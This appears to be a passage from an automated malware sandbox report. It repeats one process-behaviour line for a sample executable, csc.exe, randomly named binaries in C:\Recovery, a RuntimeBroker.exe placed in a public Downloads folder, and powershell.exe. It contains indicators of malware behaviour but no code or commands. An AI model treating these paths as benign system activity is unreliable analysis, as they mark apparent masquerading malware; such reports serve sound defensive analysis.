                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\user\Desktop\W4tW72sfAD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Recovery\juptXkyeRvGsIZrQGeVEsrnWhD.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Users\Public\Downloads\RuntimeBroker.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
